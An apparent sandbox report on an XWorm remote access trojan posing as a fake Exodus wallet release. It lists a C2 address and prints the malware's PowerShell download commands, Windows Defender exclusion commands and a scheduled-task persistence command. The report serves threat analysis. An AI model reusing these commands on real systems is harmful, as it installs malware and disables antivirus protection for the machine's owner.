xworm | hxxps://github[.]com/ek4o/fake-exodus/releases/tag/ekoTools

Resubmissions

03/03/2025, 16:00

250303-tf222asjz2 5

03/03/2025, 15:28

250303-swbpca1nz4 10

02/03/2025, 14:26

250302-rr1x1awygx 10

Analysis

max time kernel
232s
max time network
238s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
02/03/2025, 14:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/ek4o/fake-exodus/releases/tag/ekoTools

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

137.184.74.73:5000

Mutex

Y2rnj2CSRObOXXLb

Attributes

Install_directory
%ProgramData%
install_file
System.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/6012-293-0x0000000003080000-0x000000000308E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 28 IoCs

flow	pid	Process
94	5508	powershell.exe
96	5508	powershell.exe
97	4656	powershell.exe
98	4656	powershell.exe
113	6008	powershell.exe
114	6008	powershell.exe
115	5876	powershell.exe
116	5876	powershell.exe
130	3536	powershell.exe
131	3536	powershell.exe
133	4456	powershell.exe
134	4456	powershell.exe
138	6008	powershell.exe
139	6008	powershell.exe
140	4888	powershell.exe
141	4888	powershell.exe
143	5632	powershell.exe
144	5632	powershell.exe
145	308	powershell.exe
146	308	powershell.exe
149	5848	powershell.exe
150	5848	powershell.exe
151	1056	powershell.exe
152	1056	powershell.exe
156	4444	powershell.exe
157	4444	powershell.exe
158	5136	powershell.exe
159	5136	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5864	powershell.exe
5652	powershell.exe
4888	powershell.exe
5632	powershell.exe
5848	powershell.exe
4444	powershell.exe
5136	powershell.exe
5508	powershell.exe
4656	powershell.exe
6008	powershell.exe
5876	powershell.exe
3536	powershell.exe
4456	powershell.exe
308	powershell.exe
1056	powershell.exe
6008	powershell.exe

Downloads MZ/PE file 14 IoCs

flow	pid	Process
157	4444	powershell.exe
159	5136	powershell.exe
96	5508	powershell.exe
98	4656	powershell.exe
114	6008	powershell.exe
116	5876	powershell.exe
131	3536	powershell.exe
139	6008	powershell.exe
141	4888	powershell.exe
146	308	powershell.exe
134	4456	powershell.exe
144	5632	powershell.exe
150	5848	powershell.exe
152	1056	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation	AggregatorHost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation	ExodusInject.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe

Executes dropped EXE 24 IoCs

pid	Process
5956	ExodusInject.exe
6096	Exodus.exe
6012	AggregatorHost.exe
1992	ExodusInject.exe
4636	Exodus.exe
3028	ExodusInject.exe
5544	Exodus.exe
2684	ExodusInject.exe
2612	ExodusInject.exe
6076	System.exe
5372	ExodusInject.exe
6092	ExodusInject.exe
3020	Exodus.exe
768	ExodusInject.exe
4736	Exodus.exe
5844	ExodusInject.exe
280	Exodus.exe
5556	Exodus.exe
4684	System.exe
1128	ExodusInject.exe
3936	Exodus.exe
3260	ExodusInject.exe
4996	Exodus.exe
6116	System.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

flow	ioc
144	raw.githubusercontent.com
98	raw.githubusercontent.com
116	raw.githubusercontent.com
157	raw.githubusercontent.com
96	raw.githubusercontent.com
131	raw.githubusercontent.com
134	raw.githubusercontent.com
146	raw.githubusercontent.com
150	raw.githubusercontent.com
159	raw.githubusercontent.com
95	raw.githubusercontent.com
114	raw.githubusercontent.com
139	raw.githubusercontent.com
152	raw.githubusercontent.com
141	raw.githubusercontent.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2248	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6068	schtasks.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

pid	Process
936	msedge.exe
936	msedge.exe
2664	msedge.exe
2664	msedge.exe
3492	identity_helper.exe
3492	identity_helper.exe
5440	msedge.exe
5440	msedge.exe
5508	powershell.exe
5508	powershell.exe
5508	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
5652	powershell.exe
5652	powershell.exe
5652	powershell.exe
5864	powershell.exe
5864	powershell.exe
5864	powershell.exe
6008	powershell.exe
6008	powershell.exe
6008	powershell.exe
5876	powershell.exe
5876	powershell.exe
5876	powershell.exe
2572	msedge.exe
2572	msedge.exe
2572	msedge.exe
2572	msedge.exe
3536	powershell.exe
3536	powershell.exe
3536	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
6008	powershell.exe
6008	powershell.exe
6008	powershell.exe
4888	powershell.exe
4888	powershell.exe
4888	powershell.exe
5632	powershell.exe
5632	powershell.exe
5632	powershell.exe
308	powershell.exe
308	powershell.exe
308	powershell.exe
5848	powershell.exe
5848	powershell.exe
5848	powershell.exe
1056	powershell.exe
1056	powershell.exe
1056	powershell.exe
4444	powershell.exe
4444	powershell.exe
4444	powershell.exe
5136	powershell.exe
5136	powershell.exe
5136	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	5508	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	5956	ExodusInject.exe
Token: SeBackupPrivilege	5156	vssvc.exe
Token: SeRestorePrivilege	5156	vssvc.exe
Token: SeAuditPrivilege	5156	vssvc.exe
Token: SeDebugPrivilege	5652	powershell.exe
Token: SeDebugPrivilege	5864	powershell.exe
Token: SeDebugPrivilege	6012	AggregatorHost.exe
Token: SeDebugPrivilege	6012	AggregatorHost.exe
Token: SeDebugPrivilege	6008	powershell.exe
Token: SeDebugPrivilege	5876	powershell.exe
Token: SeDebugPrivilege	1992	ExodusInject.exe
Token: SeDebugPrivilege	3028	ExodusInject.exe
Token: SeDebugPrivilege	2684	ExodusInject.exe
Token: SeDebugPrivilege	2612	ExodusInject.exe
Token: SeDebugPrivilege	6076	System.exe
Token: SeDebugPrivilege	5372	ExodusInject.exe
Token: SeDebugPrivilege	3536	powershell.exe
Token: SeDebugPrivilege	4456	powershell.exe
Token: SeDebugPrivilege	6092	ExodusInject.exe
Token: SeDebugPrivilege	6008	powershell.exe
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeDebugPrivilege	768	ExodusInject.exe
Token: SeDebugPrivilege	5632	powershell.exe
Token: SeDebugPrivilege	308	powershell.exe
Token: SeDebugPrivilege	5844	ExodusInject.exe
Token: SeDebugPrivilege	4684	System.exe
Token: 33	1564	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1564	AUDIODG.EXE
Token: SeDebugPrivilege	5848	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	1128	ExodusInject.exe
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeDebugPrivilege	5136	powershell.exe
Token: SeDebugPrivilege	3260	ExodusInject.exe
Token: SeDebugPrivilege	6116	System.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe
2664	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2664 wrote to memory of 2176	2664	msedge.exe	85
PID 2664 wrote to memory of 2176	2664	msedge.exe	85
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 4624	2664	msedge.exe	86
PID 2664 wrote to memory of 936	2664	msedge.exe	87
PID 2664 wrote to memory of 936	2664	msedge.exe	87
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88
PID 2664 wrote to memory of 1080	2664	msedge.exe	88

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/ek4o/fake-exodus/releases/tag/ekoTools
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0x100,0x104,0xe4,0x108,0x7ffb004746f8,0x7ffb00474708,0x7ffb00474718
  2⤵
  PID:2176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
  2⤵
  PID:4624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2952 /prefetch:8
  2⤵
  PID:1080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  PID:4368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
  2⤵
  PID:3408
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 /prefetch:8
  2⤵
  PID:656
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:1352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
  2⤵
  PID:1556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
  2⤵
  PID:3324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:3692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
  2⤵
  PID:4204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5568 /prefetch:8
  2⤵
  PID:3580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2720 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,11219437284957711409,365090262099851969,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6048 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2572

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3876

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:952

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5328

C:\Users\Admin\Desktop\ex\ExodusLoader.exe
"C:\Users\Admin\Desktop\ex\ExodusLoader.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:5404
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4002.tmp\4003.tmp\4013.bat C:\Users\Admin\Desktop\ex\ExodusLoader.exe"
  2⤵
  PID:5496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\Desktop\ex\ExodusInject.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\Desktop\ex\Exodus.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4656
- - C:\Users\Admin\Desktop\ex\ExodusInject.exe
    "C:\Users\Admin\Desktop\ex\ExodusInject.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6906.tmp.bat""
      4⤵
      PID:4652
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:2248
- - C:\Users\Admin\Desktop\ex\Exodus.exe
    "C:\Users\Admin\Desktop\ex\Exodus.exe"
    3⤵
    - Executes dropped EXE
    PID:6096

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5156

C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6012
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault05db7ad5h9c49h40ddh95eah6fe9b792328e
1⤵
PID:5744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
